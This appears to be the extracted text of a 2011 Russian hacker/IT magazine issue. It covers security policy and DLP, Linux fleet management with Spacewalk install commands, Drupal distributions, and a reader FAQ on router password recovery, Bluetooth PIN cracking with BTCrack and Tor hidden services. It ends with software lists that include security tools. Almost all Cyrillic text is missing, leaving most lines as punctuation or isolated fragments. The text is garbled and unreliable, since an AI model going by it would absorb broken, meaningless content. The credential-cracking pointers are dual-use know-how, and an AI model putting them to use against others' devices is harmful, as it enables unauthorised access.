Address space layout randomization (ASLR) ,
.
.
Per-process securebits
, .

VARIOUS
:

: make nconfig ( , menuconfig) make
localmodconfig (
).
( memtest,
memtest
) kgdb.
Fanotify
, inotify dnotify,

.
, read() write().
LatencyTop
. z

10 /153/ 2011

12 2200 .
6 1260 .
,
!

.
: 210

GOOGLE CHROME 030

x 09 (152) 2011

LULZSEC
09 (152) 2011

082

LULZSEC / FOX NEWS

1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .

500 .



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS



+ + 2 DVD:
162
( 35% , )

!
,
.

12 3890 (24 )
6 2205 (12 )

.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (


, , ).

SYN/ACK

aka 13oz

INFO


, Information
Security Policies Made
Easy
.

, ,
-152 (
), - ,

,
. , .

-

.
,
,
,

,
.
,

128

?
, ( , ?),
,
. :
(75+ ),
, - 1
. , ,
1 , RDP VPN. -
(
),
.
, , , ,
, -152 ,
, , . .

10 /153/ 2011


- .
, . ,
( ,
), .
? -, , , , ,
, /
.
:
,
,
, .
, :
1.
,
,
.
2. , , etc.
3. , . , ,
.
, (
,
), web- mail-, wsus,
VPN HQ ,
.
. .
, ,
.
, IP-,
,
.
,
, USB- ,

-,
,
. , . ,
,
. :
1. ,
, , , ,
. ,
, ,
, -
.
. ,
, .
2. . ,
. port security .
, - . 1,
, .
port security

10 /153/ 2011

( )
/, . , .
, , ,
,
, .
,
. ,

, ,
,
,

,
, (
IDS), .

:
, ,
. , , , : (
) ,
. , ...
, ,

,
,
, . . .
, , ,
USB-, ,
?.. .
,

, .

, . ?
, .
(

) ,
?

, . ,
, .

.
, -
: ,
.
,





129

SYN/ACK
, ,
.
, :
, ,
,
.

,
. , ,
, ,

,
.
, , - ,
. : ,
.
( ), DLP-.
, ,
, DLP
. , -,
: .
( ,
, ), - ,
, .
, DLP-
,
. , ,
,
. .
,
( ),
,
, , ,
(
), ,
.
Websence DSS.


. , , -
, , , ,
,
. , ,
,
,
.
, :
, . ,
.
,
, web- mail-.
,
DLP-

mail. , , ,
. , , ,
, ,
,
.

? -,
. :
- ,
.
-
. , ,
: - , -
. ,
.

- .
. . ,
. z


:
1. (-).
2. . .
3. Gray Hat Ethical Hackers Handbook.
, -
.
, .

130

10 /153/ 2011

>> coding

SYN\ACK

grinder (grinder@tux.in.ua)

INFO
OCS
Inventory GLPI




][ 06.2010).



LINUX

Linux ,
.

-
( ),
,
,
, , .
,

Linux-.

132

WWW

Symbolic:
opensymbolic.org
Func:
fedorahosted.org/
func
obbler:
fedorahosted.org/
cobbler

Certmaster:
fedorahosted.org/
certmaster
smolt:
smolt.fedoraproject.org
Pulse 2:
pulse2.mandriva.org

Spacewalk:
fedorahosted.org/
spacewalk,
spacewalk.redhat.
com.


SYMBOLIC
Linux ,
. , ,
(Kickstart, AutoYaST
JumpStart, PXE), (Cfengine, Puppet,
Func), bash. .
,
,
. .
-,
*nix. ,
, .

: SYMBOLIC!
Linux Symbolic (opensymbolic.org)
,
:
;
Bash, Perl,
Python, Groovy , ;

10 /153/ 2011

Symbolics

Pulse 2

LDAP, Kerberos,
Kerberos + LDAP (Active Directory) ;
VNC;
, , ;
RSS ( );
RedHat Application Stack,
- .

, 8081 (http://example.
org:8081/symbolic).

Symbolic ( ).

, .
, Ajax. ,
, ,
.
. , RedHat/Fedora. Symbolic
,
: YUM, Func (fedorahosted.org/func), Cobbler
(fedorahosted.org/cobbler), Certmaster (fedorahosted.org/certmaster),
Smolt (smolt.fedoraproject.org). Smolt,
. ,
Puppet.
Symbolic Java. GNU GPL.
, OpenSource
, .
Symbolic Fedora,
. RPM-
Fedora RedHat.
Fedora 15 RedHat6/CentOS6
.

EPEL Extras.
( ) ,
, . , (
) Certmaster Func,
- . symbolic
symbolic-setup, . -

10 /153/ 2011

PULSE 2
RedHat
-. Mandriva , Pulse 2 (pulse2.mandriva.org),
100 . .
. Linux (RedHat/Mandriva/Debian/
Ubuntu), Mac OSX, HP-UX, IBM AIX, Solaris Windows 2k/XP/2k3/
Vista/2k8/Se7en ( x86). , ( Python,
PHP). Pulse 2 OpenSource-.
:
Pulse 2 OCS Inventory NG ( ][ 06.2010),

. ,
GLPI
(glpi-project.org).
Nagios. , ,
. Pulse 2
:
;
;

Pulse 2

133

SYN/ACK

Spacewalk


( );
,
;
VNC-;
;
;
.
1.3.0 Pulse 2 Linbox Rescue
Server ( Pulse 2 Imaging Server).
()
( Linux Windows) . SSH.

Inventory Proxy SSL.
Mandriva Directory Server (mds.
mandriva.org). -,

Mandriva MMC (Mandriva Management Console).
, ,
,
.
.
ACL.
ommunity- , GNU GPL.
VMware Mandriva
Enterprise Server 5 Pulse 2 (
, ).
VMware 256 ,
512 , .
-,
IP- Pulse 2.
Linux .
LDAP MySQL. -
,
. ,
.


Spacewalk (fedorahosted.org/spacewalk, spacewalk.redhat.
com) GPLv2 Red Hat Network

134

Satellite Server, 2001 . .


-, Linux.
, Satellite,
, RedHat.
, .
Satellite, Spacewalk RHEL/
Fedora, SLE/openSUSE Debian. .
(spacewalk.redhat.com/solaris) Solaris.
, Git . Spacewalk, :
;
Xen KVM;
;
;
Kickstart- AutoYaST;
, ;
;
;

.
Spacewalk - , , , .
-, ,
, . .
Spacewalk Proxy .
LDAP. LDAP
, LDIF-, . , , , CSV-.
, , .
,
PostgreSQL Oracle 10g Express Edition.

Oracle Satellite, PostgreSQL .

GOSA2
.
OpenSource- .
GOsa2 (oss.gonicus.de), -,
LDAP.

UNIX Samba, DHCP,
DNS, HTTP, SMTP , VoIP, .
GOsa
. 30 ,
GOsa: Squid, DansGuardin, rsyslog, Postfix, Courier-IMAP, Maildrop,
GNARWL, Cyrus-SASL, OpenSSL, Asterisk, Nagios, OPSI, Netatalk, FAI,
SOGo, OpenGroupware, Kolab, Scalix, ISC DHCP ( LDAP), WebDAV, PureFTPd, PPTP, Kerberos.

10 /153/ 2011

SPACEWALK
, , RedHat/CentOS/Fedora. ,
( Git) , . Debian .

, Fedora 15 Spacewalk :
# rpm -Uvh http://spacewalk.redhat.com/yum/1.5/Fedora/15/x86_64/
spacewalk-repo-1.5-1.fc15.noarch.rpm
jpackage.
# cat > /etc/yum.repos.d/jpackage-generic.repo << EOF
[jpackage-generic]
name=JPackage generic
baseurl=http://mirrors.dotsrc.org/jpackage/5.0/generic/free/
enabled=1
gpgcheck=1
gpgkey=http://www.jpackage.org/jpackage.asc
EOF
SELinux:
# rpm -Uvh 'http://kojipkgs.fedoraproject.org/packages/selinuxpolicy/3.9.16/35.fc15/noarch/selinux-policy-targeted-3.9.16-35.
fc15.noarch.rpm' 'http://kojipkgs.fedoraproject.org/packages/
selinux-policy/3.9.16/35.fc15/noarch/selinux-policy-3.9.16-35.
fc15.noarch.rpm'
.
, .
PostgreSQL. , Spacewalk
:
# yum install spacewalk-postgresql postgresql-server
PostgreSQL,
, :
# spacewalk-setup --disconnected
(,
), . , ( Wiki ),
spacewalk-setup.

GOsa2

Spacewalk
, .
, , , . , .
, ,
- .
.
, Spacewalk. ,
. ,
, .
, .
,
. , , . (
).
.
. , .
. rhn-*. Fedora 15 :
# rpm -Uvh http://spacewalk.redhat.com/yum/1.5/Fedora/15/x86_64/
pacewalk-client-repo-1.5-1.fc15.noarch.rpm
# yum install rhn-client-tools rhn-check rhn-setup rhnsd
m2crypto yum-rhn-plugin
Spacewalk
rhnreg_ks, URL
. :
# rhnreg_ks --serverUrl=http://example.org/XMLRPC \
--activationkey=<->
,
.

Spacewalk

10 /153/ 2011

, Linux-. , ? .
Spacewalk.
Pulse 2 . z

135

SYN/ACK

Spider_NET
Sp
(http://vr-online.ru)

Drupal

.
Drupal
( CMF),
.
, . Drupal
-,
.
136

VIDEO


,

.

ETHERNET-
, , -.
, . ,

, ,
.
, . ,
, :
1. .
.
.
.
. , ,
.
2. . : . ethernet .
.
3. . , Facebook,
, ,
. ,
, () .
.

10 /153/ 2011

Drupal

, ,
. .
( IT-),
.
8. .
. ,
. ,

.

Open Atrium

.
,
. (),
.

DRUPAL!
4.

5.

6.

7.

8.

, ,
.
+ -.

MS Exchange.
, .
- Exchange
. Exhange . ,

MS Exchange,
MS Outlook. ,
.
- web. ,
ethernet-,
, ,
ToDo-, /.
.
, . ,
. ,
,
( ) .
.
.
-, , , , , .
.
,
,
,
.
.
,
.
: , , , . .

. .
Help Desk. ,
IT-.
Ethernet-
IT- .

10 /153/ 2011

Drupal , .
,
. Drupal . -, , -
CMS ,
. Drupal ,
, .
, Drupal

. , . Drupal
, -

. Drupal .
.
,
,
Drupal.

DRUPAL
Drupal . Drupal ,
. ,
.
:
1. CMS Drupal. Drupal, drupal.org.

Drupal Commons

137

SYN\ACK

Dashboard Open Atrium

2. . / .
.
, . ,
.
3. . .
.

. / .
.
. , .
-
Google Calendar.
.
web-based-.
. ToDo-, ,
.
. .
.
Wiki.
/
. Wiki.
. Drupal -
... Drupal,
. OA
,
, , Drupal.

DRUPAL

OPEN ATRIUM
http://openatrium.com/
Open Atrium ,
. Open Atrium ,
. . , OA ,
-. OA Drupal, ,
Drupal
. OA
-.
OA . 2009 .,

. , OA
.
(1.0) .

. Open Atrium
.
: , wysiwyg-,
. .


,
, . Drupal,

drupal.org/project. ,
Open Atrium
.

138

Drupal
-. ,
Drupal. .
Conference Organizing Distribution (http://drupal.org/project/cod)
. ,
,
. , Drupal LA, Drupal
Kiev Camp.
Array Shift (http://drupal.org/project/arrayshift)
stackoverflow.com.
, .
Drupal Social Netwrok framework (http://drupal.org/project/dsnf_install)
,
.
,
.
DrupalBin (http://drupal.org/project/drupalbin) , /
. .
.
ELMS (http://drupal.org/project/elms)
(
, . .).
.
eRecruiter (http://drupal.org/project/recruiter)
, . , -,
.
.
Single-use blog (http://drupal.org/project/single_user_blog)
.
WordPress.

10 /153/ 2011

Drupal

. GCalendar?

-.
,
( ).
OA , .

Open Atrium .
,
. ,
-. OA
.

. .
,
/ .
,
. , .
.
.
OA, , .
, . . .

.
: 8/10.

DRUPAL COMMONS
http://acquia.com/downloads
Drupal Commons .

.
-. , Drupal Commons
. DC. Open
Atrium, DC
Acquia.
Drupal. , Drupal, Open Scholar, Acquia Drupal, OpenPublish.

. , Microsoft Acquia.

. . ,
.
/.
Wiki.
.
.

Drupal.
.
, DC- .
.
.
: 5/10.

Drupal Commons

10 /153/ 2011

Drupal . Drupal . Drupal


,
, CMS ,
(-
) . . ,
.
Drupal.
-, ( ), . z

139

UNITS / FAQ UNITED

FAQ United


FAQ@REAL.XAKEP.RU


OPENWRT, , ,
.
, -
4 .
,
,

(
)?



, .
OpenWRT (openwrt.org)
Image
Generator (bit.ly/oWxmJd),
firmware.
,
,
.

PPTP/L2TP. ?



( ).
,
,
,
.

,
RouterPassView (www.
nirsoft.net/utils/router_password_recovery.
html).
,
Grab Password
From IE Window. ,
Internet Explorer.

WI-FI,
. ,
?


,
, .
,
, ChilliSpot (www.
chillispot.info). ?

- , Chillispot DNS- ,
.
,
. RADIUS-
( FreeRadius www.freeradius.org).

, ChilliSpot .
Linux-.


FIREFOX,

-
. - ?
Firefox .
, - ,
. Firefox
: ,
4.0 ( ),
6.0.2 . :
1. , .xpi- (

Firefox) zip-. ,
.
2. install.rdf targetApplication:

<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e13a3a9e97384}</em:id>
<em:minVersion>4.0</em:minVersion>
<em:maxVersion>5.0</em:maxVersion>
</Description>
</em:targetApplication>
,
minVersion maxVersion.
3. zip- .xpi.

Nightly Tester Tools (bit.ly/pwWh7c).

5 :
,
. -

.
( nmap:
nmap -sL 146.187.130.0/24), ,
.
?

140

, ,

. SNMP-,
( traceroute),
.
, .

LanTopolog (www.lantopolog.com/rus).
,
,
SNMP.
. !

10 /153/ 2011

FAQ UNITED


-
,
.

TOR
LINUX. :
TORIFY
(TORIFY FIREFOX) TORSOCKS (TORSOCKS
FIREFOX). .
?

, -,
, ( ), , ,
.
, EDGE-, GPRS-, 3G-,
. ,

( - . .). XCode (developer.apple.com/technologies/tools),
iPhone/iPad, . Network Link Conditioner
. Windows
SoftPerfect Connection Emulator (www.softperfect.com): ,
. TMnetSim Network Simulator (www.
tmurgent.com/tools.aspx). , ( , ) GUI. (, SQL Server).
WANem (wanem.sourceforge.net).
Knoppix LiveCD-,
-. LiveCD ,
(, VirtualBox) .

torsocks,
DNS-
,
.

, , ,
. ,
?


TOR?

1. GUI-
Tor Vidalia.
2. Settings Services.
3. Virtual Port,
Target Directory Path. , :

Virtual Port: 80
Target: 127.0.0.1:80 or just 127.0.0.1
Directory Path: c:\torhs or /home/username/
torhs
4. ,
Service .onion- ,
.



AMAZON S3?

,
Amazon
AWS Free Usage Tier (aws.amazon.
com/free), S3 . ,
.
Windows.
,
Amazon S3. ,
( CloudBerry Online
Backup, www.cloudberrylab.com).

Nmap (nmap.org).


. GUI- Zenmap
.
----traceroute.

10 /153/ 2011

Network Link Conditioner


: , 3G . ,
,

rumint (rumint.org).
, , .

PCAP .
.

NetCrunch (www.adremsoft.com).

IP-, , ,
,
. !

141

UNITS / FAQ UNITED

CloudBerry Online Backup Amazon S3

, , , -
, Bonkey
(thebackupmonkey.blogspot.com).
Linux.
s3- s3cmd.
Ubuntu
(
: apt-get install s3cmd). , ,
,
S3,
: s3cmd --configure.
, ,

. , s3cmd
rsync:
s3cmd --acl-private --bucket-location=EU
--guess-mime-type --delete-removed sync /
local/backup/ s3://xakep/backupfromserv1
cron ,
( - Amazon
).
,
?
:
s3cmdsyncs3://xakep/backupfromserv1/local/
backup/


Q , . (
)

. ?


forensics-. ,
, OWADE (OFFLINE
WINDOWS Analyzer and Data Extractor, bitbucket.

142

RouterPassView ,

org/Elie/owade). Python,
Linux
Windows. (./main.py) 8080-
(http://
localhost:8080/owade),

.


BLUETOOTH.
PIN-
(BLUETOOTH PASS PHRASE).
, ?


BTCrack.
(bit.ly/oKWbij),
Linux (bit.ly/qHkCoQ).
,
,

( , ,
). Bluetooth
,
,
.


PYTHON.
?


Beautiful Soup (www.crummy.com/software/
BeautifulSoup), lxml (lxml.de), scrapy (scrapy.org).
Grab (bitbucket.org/
lorien/grab),
.

(bit.ly/p9Srxf):
(cookies,
http-, POST/GET-);
(
HTTP/SOCKS-);
( ,

cookies, ,
);
DOM-
( HTML-);
(,
);
: ,
.

,
xakep Google
10 :
g = Grab()
g.go('http://www.google.ru')
g.set_input('q', 'xakep')
g.submit()
for elem in g.itercss('#rso li h3 a'):
print u'%s | %s' % (elem.get('href'),
elem.text_content().strip())

,


. ,

.
,

( ).
FEDORA.

Sagan (sagan.
quadrantsec.com).



IDS- Snort.
,
oinkmaster (oinkmaster.
sourceforge.net) pulledpork (code.google.com/p/
pulledpork). , Snort , Sagan
. z

10 /153/ 2011

>Net
Cyberduck 4.1.2
DynaMAC 2011-08-31
Fiddler2
G+7 1.2.0.0
LinkChecker 7.1
Miranda IM 0.9.30
MTPuTTY 1.0 Beta
NetworkTrafficView 1.00

>Multimedia\
AIMP 2.61 Build 583
FastPreview 3.1
FastStone Image Viewer 4.6
GOM Player 2.1.33.5071
Graphs Made Easy 3.1
Juice
Lightshot 1.4
Open Freely
Paint.NET 3.5.8
Snaplr
VisualSubSync 1.0.0
ZS4 Video Editor 0.958

>Misc
4t Tray Minimizer Free 5.52
8start Launcher 3.0
Autosensitivity 1.4
Better Directory Analyzer 1.0
Bins
EyeLeo 1.1
FastPreview
FileMindQuickFix 1.0
Gest 2.3.0
HotkeyP
LightShot 1.4.0
Microsoft Mathematics 4.0
Mouse Without Borders
Prey 0.5.3
SuperCopier 2.2 Beta
TouchFreeze 1.0.2

>>WINDOWS
>Development
Beyond Compare 3
DiffMerge 3.3.1
DPack v3.0.13
DreamCoder for MySQL 6.0
DreamCoder for Oracle 6.0
DreamCoder for PostgreSQL 6.0
EmEditor Free 6.00.4
EmEditor Professional 10.1.1
GhostDoc 3.0
HelpNDoc
IOGraph 0.9
NUnit 2.5.10
OdoPlus 1.6
PostgreSQL 9.1
ReSharper 6.0
StyleCop 4.5
TestDriven.NET 3.1.2759 Beta
Visual Assist X 10.6
Visual Paradigm for UML 8.2
Community Edition
VisualSVN 2.0.6
VisualSVN Server 2.1.10
XRefresh 1.5

>>UNIX
>Desktop
Clex 4.6
Converseen 0.4.3
Double Commander 0.5.0
Genius 1.0.14
Gnac 0.2.3
GTKRawGallery 0.9.61
jHepWork 3.1
Jomic 0.9.33
Kwave 0.8.6
Mplayer tools 7.8
QtiPlot 0.9.8.8
Qucs 0.0.16
Recoll 1.15.8
Shotwell 0.11
Tovid 0.34

>System
Bluetooth Driver Installer 1.0.0.72
Boot-US 2.1.8
CCleaner 3.10
Check Disk GUI
Comodo System-Cleaner 3.0.17
Crucial System Scanner
Defraggler 2.06
Disk Bench 2.6.1.0
ERUNTgui 1.3.0
HWiNFO
Malwarebytes Anti-Malware
1.51.2.1300
Minimem 2.0
Moo0 SystemMonitor 1.64
Recuva 1.40
Secunia PSI 2.0
Speccy 1.12.265
SSDlife Free 2.1.29
USB Monitor
VirtualBox 4.1.2
Web Log Storming

> Security
Agnitio v2
AVZ 4.35
Cryptohaze Multiforcer 1.0
HashGenerator 1.0
INSECT Pro 2.6.1
ldap-blind-explorer
MoonSols DumpIt
pev 0.40
SIP Inspector 1.34
theHarvester 2.1 Blackhat Edition
TrueCrypt 7.1
WebInject 1.41
WFuzz 2.0
WPScan WordPress Security
Tool 1.0
xpath-blind-explorer
ZAP 1.3.2

SFTP Net Drive 1.0.12


ShareScan 1.0.0.2
VPN Watcher
WakeMeOnLan v1.10
Website Load Tool 1.0
York 1.50

>Security
Aide 0.15.1
Arachni 0.3
Armitage 09.08.11
Bastille 3.2.1
FBPwn 0.1.3
Lshell 0.9.14
Malheur 0.5.2
Megiddo 0.4.0
Mobius Forensic Toolkit 0.5.9
Nixory 1.1
Suricata 1.0.5
T50 5.4
Trojan scan 1.4.1
TrueCrypt 7.1
UnHash 1.1
Websecurify 0.8
Wireshark 1.6.2
Xfprot 2.4
aidsql
APKInspector BETA
Cryptohaze Multiforcer 1.0

>Net
Adobe Flash Player 10.3.181.22
BaGoMa 1.10
BitlBee 3.0.3
Cone 0.89
Creepy
Google Chrome 13
gPodder 2.13
JFBChat 0.2.2
LinkChecker 7.1
Linphone 3.4.3
Mozilla Firefox 6.0.2
NetworkManager 0.9
Opera 11.51
Qt Cloud Drive
quIRC 0.7.11
Tyrs 0.4.0
Wget 1.13
Xymon Alert 4.3.4

>Devel
Collabtive 0.7
Database Deployment Manager
0.1e
DBeaver 1.3.4
dbm 1.9
Dhex 0.65
diffutils 3.1
GDB 7.3a
IPython 0.11
JFormDesigner 5
JPPF 2.5.2
MetaModel 2.0
MyJgui 0.7.4.1
PyPy 1.6
Qt Creator 2.3
Rails 3.1
RKWard 0.5.6
Shogun 1.0.0
Vaadin 6.6.6

Veusz 1.13
Videotrans 1.6.1
XPaint 2.9.8.2

>>MAC
Adium 1.4.3
Android SDK 3.0r12
ClamXav 2.2.2
DesktopUtility 1.2.2
Firebird 2.1.4
FreeCol 0.10.2
FunctionFlip 2.2
GeoGebra 4.0
Lion Tweaks 1.3
Mac Games Arcade 1.7.7
MAMP 2.0.3
OpenSSH 5.9
Python 3.2.2
Parallels Desktop 7 Mac
RedQuits 2.0
Skitch 1.0.7
SMARTReporter 2.7.0
SSH Tunnel Manager 2.1.4
TrueCrypt 7.1
Tubbler 1.3.1
TVShows 2.0b11

>X-distr
Chrome OS 1.5.849
Mandriva Linux 2011.0

>System
Apt-dater 0.8.5
AQEMU 0.8.1
Arkeia 9
BleachBit 0.9.0
Ccfe 1.51
Collectd 5.0.0
eMount 0.11.2
Extcarve 1.1
G4L 0.38
Giis-ext4 0.7
HDT 0.5.0
OSS 4
QEMU 0.15
Tvpvrd 3.3.2

>Server
ABillS 0.53
Apache 2.2.20
Ashd 0.8MUSCLE 5.56
MySQL 5.5.15
OpenLDAP 2.4.26
OpenSSH 5.9
OpenVPN 2.2.1
Postfix 2.8.5
PostgreSQL 9.0.4
Samba 3.6.0
Sendmail 8.14.5

fuzzdb 1.09
hashkill 0.2.4
Malheur 0.5.1
peter-bochs
pev 0.40
SIP Inspector 1.34
slowhttptest 1.1
Snort 2.9.1
TrueCrypt 7.1
Wfuzz 2.0

10(153) 2011

UNITS /

Lockpicking


,

.

,
.

2
,
.

,
. . .

-

,



. ,

144

:
,
.

:
-,

-.
,

:
, -

.

10 /153/ 2011


,

.
,

.

>> coding

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

Оценить